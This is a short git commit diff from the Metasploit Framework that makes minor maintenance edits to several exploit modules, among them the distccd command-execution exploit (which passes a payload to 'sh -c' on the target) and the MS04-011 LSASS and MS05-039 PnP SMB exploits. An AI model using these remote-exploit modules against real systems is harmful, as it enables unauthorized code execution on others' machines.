Minor updates

git-svn-id: file:///home/svn/framework3/trunk@3778 4d416f70-5f16-0410-b530-b9f4589650da
This commit is contained in:
HD Moore 2006-07-30 21:31:02 +00:00
parent 144249b34d
commit d0bc17f17a
4 changed files with 7 additions and 7 deletions

View File

@ -17,7 +17,7 @@ module Analyze
epon = 0
sidx = 0
fd = File.open(param['database'], 'r')
fd = File.open(param['database'], 'rb')
fd.each_line do |line|
case line
when /^\s*#/

View File

@ -45,9 +45,7 @@ class Exploits::Unix::Misc::DISTCCD_EXEC < Msf::Exploit::Remote
def exploit
connect
p payload.encoded
distcmd = dist_cmd("sh", "-c", payload.encoded);
sock.put(distcmd)

View File

@ -39,7 +39,7 @@ class Exploits::Windows::Smb::MS04_011_LSASS < Msf::Exploit::Remote
{
'Space' => 1024,
'BadChars' => "\x00\x0a\x0d\x5c\x5f\x2f\x2e",
'Prepend' => "\x81\xc4\xff\xef\xff\xff\x44",
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
@ -127,7 +127,8 @@ class Exploits::Windows::Smb::MS04_011_LSASS < Msf::Exploit::Remote
Rex::Text.rand_text(528) +
NDR.long(rand(0xFFFFFF))
print_status('Calling the vulnerable function...')
print_status("Trying to exploit #{os}")
begin
response = dcerpc_call(9, stub)
rescue Rex::Proto::DCERPC::Exceptions::NoResponse

View File

@ -4,8 +4,9 @@ module Msf
class Exploits::Windows::Smb::MS05_039_PNP < Msf::Exploit::Remote
include Exploit::Remote::SMB
include Exploit::Remote::DCERPC
include Exploit::Remote::SMB
def initialize(info = {})
super(update_info(info,